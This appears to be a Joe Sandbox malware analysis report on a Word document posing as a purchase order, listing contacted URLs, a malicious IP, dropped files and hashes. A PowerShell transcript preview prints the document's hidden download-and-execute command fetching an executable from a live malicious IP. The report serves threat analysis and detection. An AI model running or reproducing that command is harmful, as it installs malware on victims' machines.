http://ariadna.elmundo.es/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
https://devnull.onenote.com	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://www.news.com.au/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.cdiscount.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://www.tiscali.it/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://it.search.yahoo.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://www.ceneo.pl/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://www.servicios.clarin.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://search.daum.net/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://www.kkbox.com.tw/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
https://skyapi.live.net/Activity/	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.goo.ne.jp/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.msn.com/results.aspx?q=	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://list.taobao.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://www.taobao.com/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://www.etmall.com.tw/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.cortana.ai	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ie.search.yahoo.com/os?command=	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://www.cnet.com/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://www.linternaute.com/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
https://visio.uservoice.com/forums/368202-visio-on-devices	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://www.amazon.co.uk/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/embed?	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://www.cdiscount.com/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
https://augloop.office.com	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
31.210.20.45	unknown	Netherlands		61157	PLUSSERVER-ASN1DE	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	433026
Start date:	11.06.2021
Start time:	07:40:29
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 35s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	RFL_PO 69002.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOC@8/13@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 3.8% (good quality ratio 3.7%) Quality average: 80.7% Quality standard deviation: 24.9%
HCA Information:	Successful, ratio: 95% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 104.43.139.144, 104.43.193.48, 52.109.32.63, 52.109.12.23, 52.109.76.35, 40.88.32.150, 20.82.209.183, 23.218.208.56, 205.185.216.42, 205.185.216.10, 20.54.7.98, 20.54.26.129, 92.122.213.194, 92.122.213.247, 20.82.210.154 Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
07:41:40	API Interceptor	34x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
31.210.20.45	BL & INV.doc	Get hash	malicious	Browse	31.210.20.45/1xBet/Corf4olpp3.exe
	Swift MT103 Transfer.xlsx	Get hash	malicious	Browse	31.210.20.45/10/nanno1.exe
	IMG_1741000.xlsx	Get hash	malicious	Browse	31.210.20.45/10/11222.exe

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
PLUSSERVER-ASN1DE	Payment Advice.pdf.doc	Get hash	malicious	Browse	31.210.20.45
	Quotation For Products.doc	Get hash	malicious	Browse	31.210.20.45
	RFL_PO 69002.doc	Get hash	malicious	Browse	31.210.20.45
	SKlGhwkzTi.exe	Get hash	malicious	Browse	151.106.118.75
	BL & INV.doc	Get hash	malicious	Browse	31.210.20.45
	BL & INV.doc	Get hash	malicious	Browse	31.210.20.45
	BL & INV.doc	Get hash	malicious	Browse	31.210.20.45
	8cuLxttsra.exe	Get hash	malicious	Browse	31.210.21.161
	Owbtvvu.exe	Get hash	malicious	Browse	31.210.20.60
	Inqquuirrryyy202106079768900100.exe	Get hash	malicious	Browse	31.210.21.188
	Swift MT103 Transfer.xlsx	Get hash	malicious	Browse	31.210.20.45
	inqqqqquiry9867120210406000900.exe	Get hash	malicious	Browse	31.210.21.188
	tzeEeC2CBA.exe	Get hash	malicious	Browse	151.106.118.75
	IMG_1741000.xlsx	Get hash	malicious	Browse	31.210.20.45
	QyKNw7NioL.exe	Get hash	malicious	Browse	151.106.118.75
	fMWJqYA8ae.exe	Get hash	malicious	Browse	151.106.118.75
	Compliance - Notice 06-03.xlsx	Get hash	malicious	Browse	151.106.118.75
	Request for Courtesy Call - Urgent.xlsx	Get hash	malicious	Browse	151.106.118.75
	Payment Advice Reference No SWT005262021.exe	Get hash	malicious	Browse	31.210.20.60
	Payment Advice Reference0000 docx.exe	Get hash	malicious	Browse	31.210.20.60

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nothinglittle.exe.log Download File
Process:	C:\Users\Public\Documents\nothinglittle.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.340009400190196
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
MD5:	CC144808DBAF00E03294347EADC8E779
SHA1:	A3434FC71BA82B7512C813840427C687ADDB5AEA
SHA-256:	3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
SHA-512:	A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\26C2BCD2-E8F6-49A5-B037-8B38394825D2 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	134922
Entropy (8bit):	5.3691107417870905
Encrypted:	false
SSDEEP:	1536:IcQIKNEeBXA3gBwlpQ9DQW+z7534ZliKWXboOilX5ENLWME9:QEQ9DQW+ziXOe
MD5:	7C76C23A4308BEA58E3FD506F8D83B61
SHA1:	413E1AFC6D4095B690532A786941A56CB76980FD
SHA-256:	D72722CF884CB8E99725E39C9EDF3E641DF452CF65B1170822715ECFCD9D1A12
SHA-512:	907EA8015B03F560643590F88C21D4817A442EDB59C6CC2DD0BB1A29AC5C14135D6A727E96CA9E71C4CECFBAD73C4A506AC3121D809165D40C8F5CFAD1ECDEED
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-11T05:41:17">.. Build: 16.0.14209.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{B54863EA-DCB1-40F2-82C0-0033BFBBA29B}.tmp Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	18828
Entropy (8bit):	5.5955983431308
Encrypted:	false
SSDEEP:	384:CtktGhboztaZpjCH/sAmESBKnCulzItq7Y94SJUeRVsBMDJ8VIYiq:otZpjCHUY4KCulzSCXehDJ8T9
MD5:	8174136751F99393637FA90D730B6DEA
SHA1:	EAD0E1BCA809316BEE905A39C81A614941A69E13
SHA-256:	33EEC1E1498A9A515B22C52CB5A038427287865D337842EE7DC6F6F3D680148B
SHA-512:	5E8D7FEC208E5DAA851379FF3893BE4DBF5336F1FEED2419C367DDD84ADC85E7CBC11EB57CD0C14E4C7BDCBEB934D6B8BCE4B62309BABA8DEC65D35218CB229C
Malicious:	false
Reputation:	low
Preview:	@...e.......................W.E.......k.!............@..........H...............<@.^.L."My...:I..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.<................):gK..G...$.1.q........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xyghfd3f.ne3.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zlxsqdho.sxz.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Local\Temp\nothinglittle.exe Download File
Process:	C:\Users\Public\Documents\nothinglittle.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	533488
Entropy (8bit):	7.949126101574067
Encrypted:	false
SSDEEP:	12288:A4tWKG1Gu7iTQezjBwaxITEI3ENCYyuqoTGYA6TJqiU1:A4tc1Gu7KzurgI3FBOAmqb1
MD5:	3C88C6EF1A906BC81FC6B5B7FC478E0C
SHA1:	1007EA59D9C209F367A1873AE6DA2EAC5FAD81EF
SHA-256:	1754283E0B6BBBBEB69F165E54E3795D3E34CA14AA7BD8BD3B7DCDD97F7DFCA8
SHA-512:	87841B94DB9F67D856CBCC4E14BE6AB56716FFFCA161ADCF23EA5931ED3A2843C5207004E0E5AE7E9E764D9D2825993E2565BE10600134B89677F7734457A0F0
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 26%, Browse Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^.i...............0......J........... ........@.. .......................`............@.....................................S........F...............'...@......l................................................ ............... ..H............text....... ...................... ..`.rsrc....F.......H..................@..@.reloc.......@......................@..B........................H..................&..................................................(1.....(....(...........s....o......}.....0..F.......(....r...po.....s.......o....(.....o....o........,..o......,..o.................0..........:.......~.............0..'..........+. ....(......Y..-.s....o.....{.......(......{...."..}......{...."..}....>..(......(......{...."..}......{...."..}....>..(......(......(.0..b........s......s.....r9..p.o.........(....(....r]..p.o.........(...

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\RFL_PO 69002.doc.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:43 2020, mtime=Fri Jun 11 13:41:17 2021, atime=Fri Jun 11 13:41:14 2021, length=428544, window=hide
Category:	dropped
Size (bytes):	2130
Entropy (8bit):	4.733614133302886
Encrypted:	false
SSDEEP:	24:816whO3hK6AkasD0S7aB6my16whO3hK6AkasD0S7aB6m:8rAxqk+DB6prAxqk+DB6
MD5:	326DA33472BCE1E3DDFC01C7DF3E2B4A
SHA1:	55CDBA308D2A068035C7682BE8CB698B9C6FE9EE
SHA-256:	61ECC0B69CCF39C58EE724609E4E94FD51718265DA3B325A37EDA0F89BABAF3F
SHA-512:	5B0EEF294BBB23CFF9243EEAA92F11CCCA3726F92652D695F38DD547856685C1FFD8933723A3C4C12AF736C21F9F3C2B4F8823BD85009538A400C5DC5264750A
Malicious:	true
Preview:	L..................F.... ...d..:...+.+..^..t.I..^...............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R#u....................:.....q\|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny..R#u.....S.....................,Q.h.a.r.d.z.....~.1.....>Qyx..Desktop.h.......Ny..R#u.....Y..............>.....Y7..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2......R(u .RFL_PO~1.DOC..R......>Qvx.R(u....h.........................R.F.L._.P.O. .6.9.0.0.2...d.o.c.......V...............-.......U...........>.S......C:\Users\user\Desktop\RFL_PO 69002.doc..'.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.F.L._.P.O. .6.9.0.0.2...d.o.c.........:..,.LB.)...As...`.......X.......061544...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	86
Entropy (8bit):	4.348872575402326
Encrypted:	false
SSDEEP:	3:M1w3pbBCvQ13pbBCmX1w3pbBCv:MG3BBWg3BBe3BBs
MD5:	FD08BA3815DD637EF453DAC8CECE58B1
SHA1:	C8A49EFC89DA0F191D9ADE78F87E2EBDA9FB489E
SHA-256:	BC7C82D01FA1956ABB9DE65B449D64764AEFA4DCED9C6562E1E486EC203213B2
SHA-512:	B7476D12D4F79102791E307D45BF96DFCA28DECFA5C08E0A2F95761C9485B7CEB6F6E4AA7236589E29A0C8EF6EC6C57229754BE94820FA512BB54A970D20A5D3
Malicious:	false
Preview:	[doc]..RFL_PO 69002.doc.LNK=0..RFL_PO 69002.doc.LNK=0..[doc]..RFL_PO 69002.doc.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.2195042105075045
Encrypted:	false
SSDEEP:	3:Rl/ZdlUixlqKF0j9lqKB5r:RtZci+eJa1
MD5:	3DB29F99C92EAE09D66E7956176941F9
SHA1:	EFFBE8C1E324025C9D2A2A5CE33984176119E3AD
SHA-256:	4CDF8B60D17CCF48A34A2AEEF85CDEFF523EB6703384E1A93D6CD789035786EB
SHA-512:	EE5C4DB284BB1B8DF5381BACF78EF0760C45BBDFC3987A2BD302E14ABF8B8FCC78D33635AC08261179834B5CA98139B69806AC39890317F9F8ACCFD2D5E69223
Malicious:	false
Preview:	.pratesh................................................p.r.a.t.e.s.h............c............$.......6C.........c............$.......6C.........c................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W7MKASODXYUB7NTL3O4Z.temp Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6205
Entropy (8bit):	3.75232480485457
Encrypted:	false
SSDEEP:	48:I4gwKGj6oyeCGUHfS81jYukvhkvklCywyxjGH1TSogZoVkDGH1TSogZoVQH:InwKXaC//51FkvhkvCCtyp0oHiC0oHiI
MD5:	FD8B140321A3D215CADA531B2CFAFD87
SHA1:	71F68840933522AF429F7C5C8659368C00A970B1
SHA-256:	EE6A71778B66C799BEF3D410C77B7FDD41F392F7716EEAA87C7024050EFE2565
SHA-512:	53B4083FB5FAC0973ED1A669B6B7D4B162AD9F0CB4D1057DCF1C55B576E8E16FBC6C725B349214CA49D1F1C725D88D1EF129DD3448C05BAEC9E9035B20E933CD
Malicious:	false
Preview:	...................................FL..................F.".. ...N....-..;yz(.a..\.................................:..DG..Yr?.D..U..k0.&...&...........-..&...:........^......t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny..R#u.....Y....................f.(.A.p.p.D.a.t.a...B.V.1......Nz...Roaming.@.......Ny..R$u.....Y....................D1,.R.o.a.m.i.n.g.....\.1.....>QCw..MICROS~1..D.......Ny..R$u.....Y........................M.i.c.r.o.s.o.f.t.....V.1.....>Qwx..Windows.@.......Ny..R)u.....Y.....................,Q.W.i.n.d.o.w.s.......1......N{...STARTM~1..n.......Ny.>Q\x.....Y..............D.......0.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.q..Programs..j.......Ny.>Q\x.....Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......Ny.>Q.v.....Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......Ny..P.......Y..........

C:\Users\user\Desktop\~$L_PO 69002.doc Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.2195042105075045
Encrypted:	false
SSDEEP:	3:Rl/ZdlUixlqKF0j9lqKB5r:RtZci+eJa1
MD5:	3DB29F99C92EAE09D66E7956176941F9
SHA1:	EFFBE8C1E324025C9D2A2A5CE33984176119E3AD
SHA-256:	4CDF8B60D17CCF48A34A2AEEF85CDEFF523EB6703384E1A93D6CD789035786EB
SHA-512:	EE5C4DB284BB1B8DF5381BACF78EF0760C45BBDFC3987A2BD302E14ABF8B8FCC78D33635AC08261179834B5CA98139B69806AC39890317F9F8ACCFD2D5E69223
Malicious:	false
Preview:	.pratesh................................................p.r.a.t.e.s.h............c............$.......6C.........c............$.......6C.........c................

C:\Users\user\Documents\20210611\PowerShell_transcript.061544._jjnsaz8.20210611074123.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1248
Entropy (8bit):	5.212967208212417
Encrypted:	false
SSDEEP:	24:BxSAHxvBn6x2DOXUWV+Wzxd/ucd/zWdaHjeTKKjX4CIym1ZJX1f+Wzxd/ucd/1ns:BZRvh6oO1+KGhdaqDYB1Zf+KGCZZA
MD5:	41198D89573FF81DF8946718A0BE7FFF
SHA1:	F2B1566B8BB857B5D146425D3005AF284B44F1A4
SHA-256:	09ED80C09E98F4397651FD1795FC28A75A101DA9032E1212033B7E56FCA6335A
SHA-512:	AB5F58ABB65094F3A08B7C4A4B68DB6272826DBF3FBA1ED9E3170789E549E2841F3227D3B26F342EB709D5AAD541B03F16FD8DC5ABFB4B84742E826F3E0CB79A
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210611074135..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 061544 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w h Start-BitsTransfer -Source http://31.210.20.45/1xBet/RFL_0769002.exe -Destination C:\Users\Public\Documents\nothinglittle.exe;C:\Users\Public\Documents\nothinglittle.exe..Process ID: 4220..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210611074135..********************..PS>Start-BitsTransfer -Source http://31.210.20.45/1xBet/RFL_0769002.exe -Destination C:\Users\Public\Documents\nothinglittle.exe;C:\Users\P

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Dell, Template: Normal.dotm, Last Saved By: Dell, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Thu Jun 10 09:54:00 2021, Last Saved Time/Date: Thu Jun 10 09:55:00 2021, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
Entropy (8bit):	7.856503203160727
TrID:	Microsoft Word document (32009/1) 54.23% Microsoft Word document (old ver.) (19008/1) 32.20% Generic OLE2 / Multistream Compound File (8008/1) 13.57%
File name:	RFL_PO 69002.doc
File size:	426496
MD5:	ee4431e2c986dcac3fc8078c674ba65e
SHA1:	64aa75122963e38f52739ba819788e4bfcfb3651
SHA256:	4219dd0fbae4f8d9e9964eac82293fefc6a7f1b75242473f6347daed349198a2
SHA512:	6de5ce6da2e111931a2dc40ded7b23c2754503b4340b0492ce68ff0480b0e3727f0697a1772ef106e194194e9e0d96916efe6296e8963819544d2d2effdfb618
SSDEEP:	12288:hlhcQMEUElwvXxKDe2YqREMm1vRm3d+QxHd5NK:vXUvvXSe27etQ3dv9m
File Content Preview:	........................>.......................-...........0...............&...'...(...)...*...+...,..........................................................................................................................................................

File Icon


Icon Hash:	74f4c4c6c1cac4d8

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "RFL_PO 69002.doc"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
Title:
Subject:
Author:	Dell
Keywords:
Comments:
Template:	Normal.dotm
Last Saved By:	Dell
Revion Number:	5
Total Edit Time:	60
